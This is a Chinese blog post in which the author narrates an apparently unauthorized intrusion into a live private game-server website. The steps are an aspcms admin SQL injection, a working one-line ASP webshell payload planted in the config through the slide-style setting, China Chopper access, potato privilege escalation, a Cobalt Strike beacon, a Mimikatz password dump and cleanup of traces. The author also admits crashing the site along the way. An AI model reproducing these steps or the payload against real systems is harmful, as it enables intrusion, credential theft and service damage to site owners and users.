记录一次游戏私服getshell过程

记录一次游戏私服getshell过程

晚上闲着无聊,想做点事情,用fofa搜了一下站点,想挖几个洞,结果看到了一个游戏私服的宣传网站,我这一看跟我之前搞过的一个站好像是一套源码。就试着想搞一搞,正好记录一下写个文章,废话不多说了,开搞。

传统的游戏宣传页面,没啥东西

试着一下输入了一下这套私服源码的后台目录,果真是一摸一样,跳到后台了~
记录一次游戏私服getshell过程_第1张图片
这套源码用的是aspcms,这版本后台有个文件未验证管理员权限,因此如何人都可以访问,同时该文件对获取参数没有使用自定义的filterPara函数过滤,导致sql注入,但是前提你得需要知道后台的目录,这里就不透露啦~网上关于这个版本的漏洞分析的文章不少。
得到后台账户密码后,我们登录后台
记录一次游戏私服getshell过程_第2张图片
嗯,没错,熟悉的页面~还是那个味!
本来还犯困的我突然精神了,简单的翻了翻后台的各个功能块,上传点基本都没法利用,写死了
aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5,这方法就不好用了
记录一次游戏私服getshell过程_第3张图片
真巧,我们这个还就是IIS7.5
不要慌,我这里还有用一种拿shell的方法,也是之前看到过某位表哥的文章学习到的
进入后台,“扩展功能”–“幻灯片设置”–”幻灯样式”
记录一次游戏私服getshell过程_第4张图片
使用浏览器的F12的开发者调试工具,将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
记录一次游戏私服getshell过程_第5张图片
按道理讲其实这一步操作完,直接用菜刀连接/config/AspCms_Config.asp这个配置文件,密码为a就可以getshell了,但是由于我手残,也可能是太晚了脑子不清醒,我把内容输错了,服务器配置文件出错了,导致服务器500了
记录一次游戏私服getshell过程_第6张图片
这怎么办,加了一下他们的游戏群,或许管理员应该会修复吧。
第二天一起床,先看了一下群消息,果不其然,群内好多吐槽的,我也跟着吐槽了一下,其实希望管理员快点修复
记录一次游戏私服getshell过程_第7张图片
发完这句话,心中默念了三句(对不起,对不起,对不起)
下午回家后,看了一眼群消息
记录一次游戏私服getshell过程_第8张图片
太棒了,给管理员点个赞,网站修好了,按照同样的步骤,我一个字母一个字母的操作,终于用菜刀连接上了,还好没出错,再搞崩了我就没心态了
记录一次游戏私服getshell过程_第9张图片
执行了一下whoami,权限太低,需要提权
在这里插入图片描述

tasklist查看了一下进程,没有杀软。只有一些游戏管理工具跟常用的服务软件
记录一次游戏私服getshell过程_第10张图片
记录一次游戏私服getshell过程_第11张图片
朋友说应该可以直接用土豆提权,上传了一个土豆提权工具,执行了一下whoami,system,可以
记录一次游戏私服getshell过程_第12张图片
服务器开启cs服务,本地登录客户端,开启监听,生成了一个cs马
记录一次游戏私服getshell过程_第13张图片
上传到服务器直接利用土豆运行一下记录一次游戏私服getshell过程_第14张图片
成功上线,system权限。
记录一次游戏私服getshell过程_第15张图片
时间不早了,利用MImikatz读取服务器登录密码,成功登录服务器,截了个图,把痕迹清理一下,就不乱动他的东西了。睡觉~
记录一次游戏私服getshell过程_第16张图片
记录一次游戏私服getshell过程_第17张图片
最后一句,大佬绕道,勿喷。

你可能感兴趣的:(安全,漏洞挖掘,漏洞分析)